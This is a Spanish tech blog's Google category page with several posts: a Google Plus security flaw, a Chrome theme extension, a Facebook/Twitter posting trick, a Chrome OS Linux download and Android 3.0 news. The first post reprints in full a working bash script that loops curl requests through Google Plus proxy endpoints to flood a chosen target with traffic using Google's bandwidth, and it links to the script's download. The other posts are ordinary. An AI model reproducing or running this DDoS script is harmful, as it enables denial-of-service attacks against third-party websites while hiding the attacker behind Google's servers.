Archivos de la categoría Google

Google Plus

Fallo de seguridad en los servidores de Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini :D

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear
fondo-google-plus

Personaliza el fondo de tu Google+

Os acordais de cuando en Facebook se podía hacer algo similar usando la appweb de PageRage? pues bien hoy presentamos una aplicación nueva que te permite hacer lo mismo, y personalizar un poco tu perfil de Google+. Se trata de Themes for Google Plus, una extensión para Google Chrome que te permitirá cambiar el fondo de Google Plus por el que más te guste.

Sigue leyendo

facebookmovil

Actualizar el estado de facebook y twitter desde Google+

Anteriormente os mostrábamos una aplicación web para visualizar la cuenta de facebook en Google+ y lo mismo para la cuenta de twitter en Google+, pero esto que os vamos a explicar a continuación no es una aplicación, sino más bien un pequeño truco para actualizar el estado de facebook y twitter desde Google+ sin necesidad de instalar nada en firefox ni google chrome, etc

  1. Vete a la dirección facebook.com/mobile y copia la dirección de correo tipo@m.facebook.com que te muestra.
  2.  Crea un circulo nuevo en Google+ y llamalo por ejemplo “Actualizar estados” o “Actualizar facebook” y añade como usuario al mail de Facebook que habíamos copiado anteriormente
  3. Cuando publiques una actualización que quieras que se publique en facebook añade el circulo que has creado en opciones de compartir. Te advertirá que el usuario no tiene Google+, le damos a aceptar y enviar, y listo… nuestro estado de facebook y Google+ actualizado simultaneamente.
Limitación: Solo permite los 50 primeros caracteres de tu publicación de Google+

Como actualizar el estado de twitter desde Google+

  1. Vete a la aplicacion twittermail, valida tu cuenta de twitter y copia la dirección de correo que te envian.
  2. Crea un circulo nuevo llamado “Actualizar twitter” (o como puse anteriormente “Actualizar estados” para así meter el correo de twitter y facebook a la vez) y añade a este circulo el mail que has recibido de twittermail.
  3. Cuando publiques una actualización en Google+ que quieres que se muestre en twitter, añade a la publicación el circulo “Actualizar twitter” y en unos segundos será publicada en twitter.
Es similar al anterior, con la salvedad de que hay crear el mail de twitter.Espero que os haya servido el pequeño truco, de está manera podréis actualizar el facebook y twitter sin necesidad de aplicaciones externas y ni si quiera sin salir de Google+ plus.

Descarga Chrome OS 1.2.725 RC


Chrome OS Linux es un nuevo sistema operativo libre que todo gira entorno al revolucionario navegador de Google, Chrome.

El objetivo de este proyecto es proporcionar una distribución ligera de Linux para vivir la mejor experiencia de navegación de la red.

Software destacados en Chrome sistema operativo Linux:

  • Linux kernel 2.6.37
  • GNOME 2.32 como entorno de escritorio
  • Google Chrome 12.0.725 navegador web
  • Google Picasa 3.0 gestor de fotos
  • LibreOffice 3,3 suite de oficina
  • GIMP 2.6 editor de imágenes
  • Wine emulador de Windows 1.3
  • Pidgin 2.7 de mensajería instantánea
  • Dashboard con barra de herramientas sociales
  • Centro de control

Fondos de escritorios nuevos y frecos y mucho más!
Requisitos del sistema operativo Linux de Chrome:

  • Procesador: Intel Pentium, Xeon o más reciente, AMD Duron,Athlon, Sempron, Opteron o más reciente
  • RAM: min. 256 MB
  • Disco duro: min. 1 GB
  • Tarjeta gráfica: compatible con tarjetas gráficas más modernas

La descarga esta vez es algo especial ya que en la página oficial del proyecto los enlaces que salen son de los servidores: uploaded.to y usershare.com y porque los servidores son lentos, he decidido subir la ISO a mi servidor y ofrezar la ISO en descarga directa desde el servidor de esta página.

Descarga: Chrome OS Linux 1.2.725 RC (x86) Live CD (133)

Google presenta Android 3.0 para las tablets

Google presenta su versión de Android 3.0 para las tablets

Google presenta Android 3.0 para las tablets

Android 3.0 Honeycomb

El gigante de internet Google presentó hoy la nueva versión de su sistema operativo Android, el Android 3.0 o Honeycomb, un software creado para disputar el dominio del popular iPad de Apple en el mercado de tabletas informáticas.
Más allá de ser una actualización de su predecesor, el Android 2.3 apodado Gingerbread, que vio la luz en diciembre, Honeycomb nació rediseñado desde sus cimientos para sacar el máximo partido a dispositivos móviles con grandes pantallas.
Android 3.0, un software libre de Google, adaptó la navegación por sus pantallas a las posibilidades que ofrecen las tabletas, permite la realización de varias tareas simultáneamente e integra un sistema para regresar rápidamente a las últimas tareas ejecutadas.

Google presenta su versión de Android 3.0 para las tablets

Google presenta su versión de Android 3.0 para las tablets

Android 3.0 es un sistema operativo apto para gráficos en 3D, con teclado virtual, reproducción de vídeo a tiempo real desde internet, videollamada, así como las conexiones de las tabletas con otros dispositivos equipados con Bluetooth.
Los ingenieros detrás de Android dedicaron el evento celebrado hoy en la sede de Google, en Mountain View, en los alrededores de San Francisco, a dar a conocer las posibilidades que ofrece el nuevo sistema operativo para los desarrolladores de aplicaciones, más que para el propio consumidor.
“Honeycomb consiste en llevar la rapidez asociada a internet a las tabletas”, comentó Hugo Barra, director de productos para móviles de Google.
Para la demostración del remodelado Android se empleó un prototipo de la tableta de Motorola Xoom, la primera que llegará al mercado equipada con Honeycomb y con fecha de lanzamiento previsto para el 17 de febrero en EE.UU..
Google aseguró que Honeycomb es compatible con todas las aplicaciones existentes ya en el mercado de Android, aunque fueran desarrolladas para versiones anteriores del sistema, y aprovechó el evento para lanzar el Android Market Webstore, un mercado de aplicaciones en la nube al estilo de lo que tiene Apple.